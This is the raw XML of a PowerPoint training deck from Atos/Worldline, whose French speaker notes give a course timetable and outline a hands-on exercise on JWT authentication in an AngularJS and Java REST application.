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5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId78"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId79"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="390" r:id="rId7"/>
    <p:sldId id="391" r:id="rId8"/>
    <p:sldId id="392" r:id="rId9"/>
    <p:sldId id="395" r:id="rId10"/>
    <p:sldId id="396" r:id="rId11"/>
    <p:sldId id="397" r:id="rId12"/>
    <p:sldId id="398" r:id="rId13"/>
    <p:sldId id="400" r:id="rId14"/>
    <p:sldId id="399" r:id="rId15"/>
    <p:sldId id="402" r:id="rId16"/>
    <p:sldId id="401" r:id="rId17"/>
    <p:sldId id="404" r:id="rId18"/>
    <p:sldId id="347" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="291" r:id="rId21"/>
    <p:sldId id="299" r:id="rId22"/>
    <p:sldId id="297" r:id="rId23"/>
    <p:sldId id="322" r:id="rId24"/>
    <p:sldId id="357" r:id="rId25"/>
    <p:sldId id="388" r:id="rId26"/>
    <p:sldId id="405" r:id="rId27"/>
    <p:sldId id="348" r:id="rId28"/>
    <p:sldId id="302" r:id="rId29"/>
    <p:sldId id="304" r:id="rId30"/>
    <p:sldId id="368" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="406" r:id="rId33"/>
    <p:sldId id="376" r:id="rId34"/>
    <p:sldId id="369" r:id="rId35"/>
    <p:sldId id="373" r:id="rId36"/>
    <p:sldId id="371" r:id="rId37"/>
    <p:sldId id="372" r:id="rId38"/>
    <p:sldId id="356" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="315" r:id="rId41"/>
    <p:sldId id="354" r:id="rId42"/>
    <p:sldId id="355" r:id="rId43"/>
    <p:sldId id="363" r:id="rId44"/>
    <p:sldId id="389" r:id="rId45"/>
    <p:sldId id="407" r:id="rId46"/>
    <p:sldId id="425" r:id="rId47"/>
    <p:sldId id="426" r:id="rId48"/>
    <p:sldId id="427" r:id="rId49"/>
    <p:sldId id="428" r:id="rId50"/>
    <p:sldId id="429" r:id="rId51"/>
    <p:sldId id="430" r:id="rId52"/>
    <p:sldId id="442" r:id="rId53"/>
    <p:sldId id="443" r:id="rId54"/>
    <p:sldId id="431" r:id="rId55"/>
    <p:sldId id="432" r:id="rId56"/>
    <p:sldId id="433" r:id="rId57"/>
    <p:sldId id="434" r:id="rId58"/>
    <p:sldId id="435" r:id="rId59"/>
    <p:sldId id="436" r:id="rId60"/>
    <p:sldId id="437" r:id="rId61"/>
    <p:sldId id="438" r:id="rId62"/>
    <p:sldId id="439" r:id="rId63"/>
    <p:sldId id="440" r:id="rId64"/>
    <p:sldId id="441" r:id="rId65"/>
    <p:sldId id="350" r:id="rId66"/>
    <p:sldId id="323" r:id="rId67"/>
    <p:sldId id="339" r:id="rId68"/>
    <p:sldId id="340" r:id="rId69"/>
    <p:sldId id="341" r:id="rId70"/>
    <p:sldId id="408" r:id="rId71"/>
    <p:sldId id="293" r:id="rId72"/>
    <p:sldId id="383" r:id="rId73"/>
    <p:sldId id="403" r:id="rId74"/>
    <p:sldId id="393" r:id="rId75"/>
    <p:sldId id="394" r:id="rId76"/>
    <p:sldId id="280" r:id="rId77"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6805613" cy="994251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9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65" autoAdjust="0"/>
    <p:restoredTop sz="95812" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="-828" y="-192"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3185"/>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p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1896" y="1890"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3132"/>
        <p:guide pos="423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handoutMaster" Target="handoutMasters/handoutMaster1.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6071461" y="9368660"/>
            <a:ext cx="625188" cy="360443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91559" tIns="45779" rIns="91559" bIns="45779" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AD910B12-E528-4D59-95AD-82AFC587F8BD}" type="slidenum">
              <a:rPr lang="nl-NL" sz="1000">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" sz="1000" dirty="0">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AddNotifier#2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157147" y="9368659"/>
            <a:ext cx="5923205" cy="40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9" tIns="45779" rIns="91559" bIns="45779"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500">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atos, the Atos logo, Atos Consulting, Atos Worldgrid, Worldline, BlueKiwi, Bull, Canopy the Open Cloud Company, Yunano, Zero Email, Zero Email Certified and The Zero Email Company are registered trademarks of the Atos group. May 2015. © 2015 Atos. Confidential information owned by Atos, to be used by the recipient only. This document, or any part of it, may not be reproduced, copied, circulated and/or distributed nor quoted without prior written approval from Atos.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="500" dirty="0">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Afbeelding 5" descr="WorldLine Logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379680" y="141322"/>
            <a:ext cx="1908153" cy="504620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3452287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88900" y="746125"/>
            <a:ext cx="6627813" cy="3727450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91559" tIns="45779" rIns="91559" bIns="45779" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680562" y="4722694"/>
            <a:ext cx="5444490" cy="4474131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91559" tIns="45779" rIns="91559" bIns="45779"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6071461" y="9224482"/>
            <a:ext cx="625188" cy="497126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91559" tIns="45779" rIns="91559" bIns="45779" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AddNotifier#3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="229273" y="9368659"/>
            <a:ext cx="5923205" cy="40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59" tIns="45779" rIns="91559" bIns="45779"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500" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atos, the Atos logo, Atos Consulting, Atos Worldgrid, Worldline, BlueKiwi, Bull, Canopy the Open Cloud Company, Yunano, Zero Email, Zero Email Certified and The Zero Email Company are registered trademarks of the Atos group. May 2015. © 2015 Atos. Confidential information owned by Atos, to be used by the recipient only. This document, or any part of it, may not be reproduced, copied, circulated and/or distributed nor quoted without prior written approval from Atos.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="500" dirty="0">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Afbeelding 8" descr="WorldLine Logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379680" y="141322"/>
            <a:ext cx="1908153" cy="504620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57343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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>9h30 – Présentation &amp; tour de table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Structure de la formation – fonctionnement PW en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>demo</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1000"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1</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a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>JOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>1. Authentication API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>We provide a REST endpoint to authenticate users after the login process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1000" dirty="0"/>
              <a:t>- Authenticator.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>App authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>On client-side, AngularJS gets the REST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> to login and authenticate. After the authentication, we store the JWT in a local storage and set the "Authorization" header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- controller.js (Login)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> JWT on locale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>storage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>You can now check that a JWT has been stored in your local storage after login/authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> JWT</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Finally, for each request, we check and validate JWT token sent by the client through the 'Authorization' header.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>A simple implementation based on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>javax.ws.rs.container.ContainerRequestFilter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>JWTRequestInterceptor.java          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000"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10</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en-US" sz="1000"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11</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en-US" sz="1000"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12</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Corriger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> à 11h – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Prendre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>pause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>reprendre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> à 11h10</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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13</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nl-NL"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14</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nl-NL"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15</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nl-NL"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16</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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241849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en-US" sz="1000" baseline="0"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18</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indent="-187569">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{62786036-71D8-437F-9E1E-5A10E0A94061}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2270185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marL="171673" indent="-171673">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL"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2</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nl-NL"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20</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nl-NL"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21</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>11h30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Corriger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> à 12h</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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22</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nl-NL"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23</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nl-NL"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24</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marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR"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25</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" b="1"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26</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a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR"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27</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r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>commence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>le</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> TP 12h15 et on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>prend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>pause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" dirty="0" smtClean="0"/>
              <a:t> à 12h30 – Reprise à</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 13h30 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>corriger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1000" baseline="0" dirty="0" smtClean="0"/>
              <a:t> pour 13h45-14h</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL"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28</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nl-NL"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29</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marL="286121" indent="-286121">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR"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3</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marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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30</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a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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31</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indent="-187443">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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32</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a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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33</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34</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1802"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"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35</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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
